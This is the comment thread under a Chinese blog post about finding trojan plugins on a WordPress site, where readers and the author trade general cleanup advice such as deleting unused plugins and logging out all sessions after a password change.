* 本文链接:https://obaby.org.cn/2023/12/14787
* 短链接:https://oba.by/?p=14787
* 转载文章请标明文章来源,原文标题以及原文链接。请遵从 《署名-非商业性使用-相同方式共享 2.5 中国大陆 (CC BY-NC-SA 2.5 CN) 》许可协议。


You may also like

21 comments

  1. Level 4
    Microsoft Edge 120 Microsoft Edge 120 Windows 10 Windows 10 cn中国–江苏–宿迁 移动

    我搬家之前的网站文件,也测到了木马,我没有抓,直接来个大换血。

    1. 公主 Queen 
      Google Chrome 118 Google Chrome 118 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

      大换血也是个办法,看看具体情况,不行的话就直接覆盖安装。

  2.  Level 6
    Google Chrome 120 Google Chrome 120 Windows 10 Windows 10 cn中国–北京–北京 电信

    你反馈的那些天,彻查没有任何发现 也是大换血 MySQL也经历了大换血处理

    1. 公主 Queen 
      Google Chrome 118 Google Chrome 118 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

      但是呢,家里的电脑上依然报毒,只能把你加白名单了~~ angel

  3. Level 5
    Firefox 120 Firefox 120 Windows 10 Windows 10 cn中国–云南–昆明 电信

    WP最烦的就是这个,文件越来越多,而且增加数量恐怖,没点技术真看不出来是啥,近期我新启了个WP站也遇到了类似的问题。

    1. 公主 Queen 
      Google Chrome 118 Google Chrome 118 Android 10 Android 10 cn中国–山东–青岛 联通

      最主要的是这几个木马插件我不知道怎么来的 no

    1. 公主 Queen 
      Google Chrome 118 Google Chrome 118 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

      嗯嗯,应该是某次上传的插件有问题。或者是插件漏洞被利用了,看来的时长关注了。

  4. Level 3
    Google Chrome 86 Google Chrome 86 Windows 10 Windows 10 cn中国–四川–成都 电信

    我现在不喜欢装插件,不用的插件和主题统统删掉,这是容易藏污纳垢的地方。
    看来图片也得留意一下,居然用来藏加密代码。
    木马截取了cookie,不知修改后台登录密码能不能防住它?

    1. 公主 Queen 
      Google Chrome 118 Google Chrome 118 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

      wp 可以注销所有登录终端,修改密码之后直接注销所有登录的终端就行了。

    1. 公主 Queen 
      Google Chrome 118 Google Chrome 118 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

      代码混淆有各种成熟的方案,但是反混淆就比较麻烦。
      他们混淆的目的就是故意让你看不懂,不知道他是干嘛用的。

  5.   Level 5
    Firefox 120 Firefox 120 GNU/Linux GNU/Linux cn中国–广东–珠海 电信

    厉害,还会破解混淆。php是这样,把一个 .php文件上传了,就能改变和执行程序了。另外就是eval这种高风险的函数。java没有这种问题,python好像也会有,只要是脚本类的语言都会

  6. Level 4
    Google Chrome 120 Google Chrome 120 Mac OS X 10.15 Mac OS X 10.15 cn中国–广东–清远 电信

    高级,直接一头雾水。只看懂了第一张配图,嗯,不错。

    1. 公主 Queen 
      Google Chrome 118 Google Chrome 118 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–济南 联通

      还好,一共四十多个,现在把没启用的都删除了。

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注